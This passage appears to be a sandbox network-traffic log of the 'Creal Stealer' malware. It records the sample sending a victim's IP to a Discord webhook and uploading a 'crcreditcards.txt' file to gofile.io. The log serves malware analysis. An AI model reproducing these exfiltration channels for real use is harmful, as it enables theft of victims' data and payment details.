2024-12-29 19:03:07 UTC	420	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 4a 4f 4e 45 53 20 7c 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 41 70 70 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 79 68 75 75 75 2f 43 72 65 61 6c Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.189 (United States)`", "embeds": [{"title": "Creal Stealer \| App Stealer", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer", "icon_url": "https://raw.githubusercontent.com/Ayhuuu/Creal
2024-12-29 19:03:07 UTC	1257	IN	HTTP/1.1 404 Not Found Date: Sun, 29 Dec 2024 19:03:07 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1735498989 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gwMCpDWiehpHf74gXesUnb7hdkoZQiiZ1hHfH2YpMWiq%2BrB3NdT0uEAXduMBc%2FAUtEUDrHrKX8pQjfFOv95PALfxgsr7Vuo772yaUb3Ufs%2BgT9H3nTiVVoyEInj%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=7140a4c162eba94fe993e9a3dad9aa978c39aba2-1735498987; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=q2rHGilsPvHFAVAUKthGeNmueMjTBtYbRjgAE1rzpIw-1735498987755-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8f9c0c60cba9334e-EWR
2024-12-29 19:03:07 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:03:08 UTC	198	OUT	POST /uploadFile HTTP/1.1 Host: store4.gofile.io User-Agent: curl/7.83.1 Accept: / Content-Length: 195 Content-Type: multipart/form-data; boundary=------------------------5fb1dacc8d3b9f42
2024-12-29 19:03:08 UTC	195	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 66 62 31 64 61 63 63 38 64 33 62 39 66 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 63 72 65 64 69 74 63 61 72 64 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 66 62 31 64 61 63 63 38 64 33 62 39 66 34 32 2d 2d 0d 0a Data Ascii: --------------------------5fb1dacc8d3b9f42Content-Disposition: form-data; name="file"; filename="crcreditcards.txt"Content-Type: text/plain--------------------------5fb1dacc8d3b9f42--
2024-12-29 19:03:09 UTC	449	IN	HTTP/1.1 200 OK Server: nginx/1.27.1 Date: Sun, 29 Dec 2024 19:03:09 GMT Content-Type: application/json Content-Length: 732 Connection: close Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2024-12-29 19:03:09 UTC	732	IN	Data Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 35 34 39 38 39 38 39 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 44 4c 6f 69 62 4e 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 75 66 41 79 75 30 6e 70 34 38 7a 62 5a 66 64 4b 6a 39 6f 4b 6e 67 55 57 6f 70 48 76 4d 74 50 62 22 2c 22 69 64 22 3a 22 38 34 34 33 37 36 34 62 2d 30 64 34 36 2d 34 66 34 64 2d 62 33 39 63 2d 31 65 37 34 34 33 64 35 39 61 63 33 22 2c 22 6d 64 35 22 3a 22 64 34 31 64 38 63 64 39 38 66 30 30 62 32 30 34 65 39 38 30 30 39 39 38 65 63 66 38 34 32 37 65 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 74 65 78 74 2f 70 6c 61 69 6e 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 35 34 39 38 39 38 39 2c Data Ascii: {"data":{"createTime":1735498989,"downloadPage":"https://gofile.io/d/DLoibN","guestToken":"ufAyu0np48zbZfdKj9oKngUWopHvMtPb","id":"8443764b-0d46-4f4d-b39c-1e7443d59ac3","md5":"d41d8cd98f00b204e9800998ecf8427e","mimetype":"text/plain","modTime":1735498989,